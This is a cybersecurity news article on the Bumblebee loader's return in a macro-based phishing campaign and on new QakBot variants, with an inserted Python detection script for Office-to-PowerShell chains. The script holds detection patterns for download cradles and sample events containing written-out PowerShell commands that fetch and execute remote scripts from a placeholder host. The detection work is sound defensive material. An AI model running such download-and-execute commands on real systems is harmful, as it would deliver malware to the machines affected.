Cyber security news for all

    The Return of Bumblebee: New Tricks Targeting U.S. Businesses

    After a four-month hiatus, the notorious malware loader and initial access broker known as Bumblebee has reappeared in a new phishing campaign aimed at U.S. businesses, according to cybersecurity firm Proofpoint.

    The campaign, observed in February 2024, targets organizations with voicemail-themed lures containing links to OneDrive URLs. These URLs lead to Word files with names like “ReleaseEvans#96.docm,” which, when opened, spoof the consumer electronics company Humane.

    The Word document uses VBA macros to launch a PowerShell command, which then downloads and executes another PowerShell script from a remote server. This script retrieves and runs the Bumblebee loader.
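    The macro-to-PowerShell chain described above is the kind of parent/child process relationship endpoint telemetry can catch. The following detection logic is an added example, not code from the article or from Proofpoint; it runs over constructed Sysmon-style process-creation events, and the field names and cradle patterns are assumptions.

```python
import re

# Parent/child pairing the article describes: a macro-enabled Word file
# launching PowerShell, which then fetches a second script.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Assumed indicators of a PowerShell download-and-execute command line.
CRADLE_PATTERNS = [
    re.compile(r"downloadstring|downloadfile", re.I),
    re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    re.compile(r"invoke-expression|\biex\b", re.I),
    re.compile(r"-enc(odedcommand)?\s", re.I),
    re.compile(r"https?://", re.I),
]

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(event):
    """Return (suspicious, reasons) for one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_PARENTS and child in SHELLS:
        reasons.append(f"{parent} spawned {child}")
    hits = [p.pattern for p in CRADLE_PATTERNS if p.search(cmd)]
    # A shell with two or more cradle markers is flagged regardless of parent.
    if child in SHELLS and len(hits) >= 2:
        reasons.append("download cradle: " + ", ".join(hits))
    return bool(reasons), reasons

def find_suspicious(events):
    """Return (EventId, reasons) for every event that matches the chain."""
    return [(e["EventId"], r) for e in events for s, r in [score_event(e)] if s]

# Constructed sample events (not real telemetry); the URL host is a placeholder.
SAMPLE_EVENTS = [
    {"EventId": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\""},
    {"EventId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-Process"},
    {"EventId": 3, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c \"iwr http://example.invalid/a.ps1 | iex\""},
]
```

Event 1 matches on both the Office parent and the cradle markers; event 3 matches on the cradle alone, so tune the two-marker threshold against your own baseline of legitimate PowerShell use.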

    First detected in March 2022, Bumblebee is primarily used to download and execute follow-on payloads such as ransomware. It has been utilized by several crimeware threat actors known for delivering BazaLoader (aka BazarLoader) and IcedID.

    Bumblebee is suspected to be developed by the Conti and TrickBot cybercrime syndicate as a replacement for BazarLoader. In September 2023, Intel 471 disclosed a Bumblebee distribution campaign that utilized WebDAV servers to disseminate the loader.

    The attack chain is notable for its use of macro-enabled documents, especially considering that Microsoft began blocking macros in Office files downloaded from the internet by default in July 2022. This change prompted threat actors to modify and diversify their approaches.

    The return of Bumblebee coincides with the resurgence of new variants of QakBot, ZLoader, and PikaBot, with samples of QakBot distributed as Microsoft Software Installer (MSI) files.

    The latest QakBot variants have been found to harden the encryption used to conceal strings and other information, making analysis more challenging. The new generation also reinstates the ability to detect whether the malware is running inside a virtual machine or sandbox.

    Additionally, QakBot now encrypts all communications with the command-and-control (C2) server using AES-256, a stronger method than before the dismantling of QakBot’s infrastructure in late August 2023.

    “The takedown of the QakBot botnet infrastructure was a victory, but the bot’s creators remain free, and someone who has access to QakBot’s original source code has been experimenting with new builds and testing the waters with these latest variants,” said Andrew Brandt, principal researcher at Sophos X-Ops.

    QakBot has emerged as the second most prevalent malware for January 2024, trailing behind FakeUpdates (aka SocGholish) but ahead of other families like Formbook, Nanocore, AsyncRAT, Remcos RAT, and Agent Tesla.

    These developments come as Malwarebytes revealed a new campaign in which phishing sites mimicking financial institutions trick potential targets into downloading legitimate remote desktop software to purportedly resolve non-existent issues, allowing threat actors to gain control of the machine.